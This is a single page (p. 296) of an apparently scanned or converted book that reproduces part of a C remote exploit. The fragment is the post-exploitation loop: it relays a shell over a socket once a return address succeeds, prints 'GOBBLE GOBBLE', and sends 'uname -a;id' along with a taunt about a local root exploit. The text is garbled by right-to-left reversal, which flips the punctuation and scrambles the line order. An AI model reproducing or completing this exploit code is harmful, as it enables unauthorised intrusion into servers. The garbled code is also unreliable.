Page 296 - بسم الله الرحمن الرحيم

P. 296

;(fflush(stdout
} (while (1
;fd_set fds
;int n

;struct timeval tv

;tv.tv_sec = EXPLOIT_TIMEOUT
;tv.tv_usec = 0

;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds

;((memset(buf, 0, sizeof(buf
} (if(select(sock + 1, &fds, NULL, NULL, &tv) > 0

} ((if(FD_ISSET(sock, &fds
(if((n = read(sock, buf, sizeof(buf) - 1)) <= 0

;break

} (if(!owned && n >= 4 && memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) == 0
;("\\\printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n

;(printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr
sprintf(expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD local

;("\\\kernel exploit to gain instant r00t\\\\n
;((write(sock, expbuf, strlen(expbuf
;++owned
{

;(write(1, buf, n
{

} ((if(FD_ISSET(0, &fds
(if((n = read(0, buf, sizeof(buf) - 1)) < 0

;(exit(1

;(write(sock, buf, n
{
{

(if(!owned
;break
{

;(free(expbuf
;(close(sock

(if(owned
;return 0

} (if(!bruteforce

296

291 292 293 294 295 296 297 298 299 300 301